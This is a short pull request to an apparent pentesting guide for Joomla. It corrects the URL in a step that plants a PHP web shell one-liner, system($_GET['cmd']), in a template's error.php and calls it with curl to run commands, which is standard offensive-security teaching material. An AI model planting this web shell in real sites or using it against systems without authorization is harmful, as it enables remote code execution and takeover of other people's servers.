### PR TITLE
fix URL error in Joomla RCE

### DIFF
--- a/network-services-pentesting/pentesting-web/joomla.md
+++ b/network-services-pentesting/pentesting-web/joomla.md
@@ -111,7 +111,7 @@ If you managed to get **admin credentials** you can **RCE inside of it** by addi
 3. Finally, you can click on a page to pull up the **page source**. Let's choose the **`error.php`** page. We'll add a **PHP one-liner to gain code execution** as follows:
    1. **`system($_GET['cmd']);`**
 4. **Save & Close**
-5. `curl -s http://joomla-site.local/templates/protostar/error.php/error.php?cmd=id`
+5. `curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id`
 
 <details>
 


### PR DESCRIPTION
The correct URL is:  
"/templates/protostar/error.php",
not:
"/templates/protostar/error.php/error.php".